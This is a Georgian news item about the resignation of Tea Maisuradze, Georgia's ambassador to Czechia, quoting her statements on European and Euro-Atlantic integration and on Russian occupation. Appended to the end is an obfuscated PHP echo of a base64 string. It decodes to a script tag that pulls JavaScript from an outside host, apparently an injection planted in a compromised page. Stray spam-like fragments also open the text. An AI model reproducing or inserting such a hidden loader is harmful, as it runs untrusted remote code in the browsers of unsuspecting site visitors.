tube
ავერსი jaluzi

ჩეხეთში საქართველოს ელჩმა, თეა მაისურაძემ თანამდებობა დატოვა. შესაბამის ინფორმაციას ის სოციალურ ქსელში ავრცელებს.

"ჩემთვის დიდი პატივი იყო მემსახურა ჩემი ქვეყნის ეროვნულ ინტერესებისთვის ათწლეულების განმავლობაში, ხელი შემეწყო მისი ევროპულ და ევროატლანტიკურ სტრუქტურებში ინტეგრაციისთვის და, ამავე დროს, დამეცვა მისი სუვერენიტეტი და ტერიტორიული მთლიანობა. მე ვრჩები საქართველოს მომავლის ერთგული", - წერს მაისურაძე სოციალურ ქსელში.

შეგახსენებთ, რომ მან სოიალურ ქსელში 29 ნოემბერსაც გააკეთა განცხადებაბა, სადაც გამოეხმაურა მიმდინარე მოვლენებს. 

მისივე თქმით, როდესაც ქვეყნის ტერიტორიის 20 პროცენტზე მეტი ოკუპირებულია რუსეთის მიერ, განსაკუთრებული მნიშვნელობა ენიჭება დასავლელ მეგობრებთან ურთიერთობების გაღრმავებასა და განმტკიცებას.

„მრავალი წლის განმავლობაში, მე და ჩემი კოლეგა დიპლომატები ძალისხმევას არ ვიშურებდით ევროკავშირსა და ნატო-ში საქართველოს გაწევრიანების გზაზე, ასევე სტრატეგიულ პარტნიორებთან კავშირების გაძლიერებისთვის.

ერთგული ვრჩები საქართველოს ევროპულ და ევროატლანტიკურ სტრუქტურებში ინტეგრაციის პროცესის, ჩვენი ქვეყნის ეროვნული ინტერესების, საგარეო პოლიტიკის პრიორიტეტებისა და კონსტიტუციის 78-ე მუხლის შესაბამისად.

დღეს, როდესაც ჩვენი ქვეყნის ტერიტორიის 20 პროცენტზე მეტი ოკუპირებულია რუსეთის მიერ, განსაკუთრებული მნიშვნელობა ენიჭება დასავლელ მეგობრებთან, ჩვენს მოკავშირეებთან, ურთიერთობების გაღრმავებასა და განმტკიცებას.

ევროპულ ოჯახში დაბრუნება ჩვენი ქვეყნის ისტორიული არჩევანია. საქართველოს ევროპულ და ევროატლანტიკურ სტრუქტურებში სრულფასოვან გაწევრიანებას, ჩვენი ქვეყნის ინტერესებიდან გამომდინარე, ალტერნატივა არ აქვს“,- წერდა ელჩი სოციალურ ქსელში.

92
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");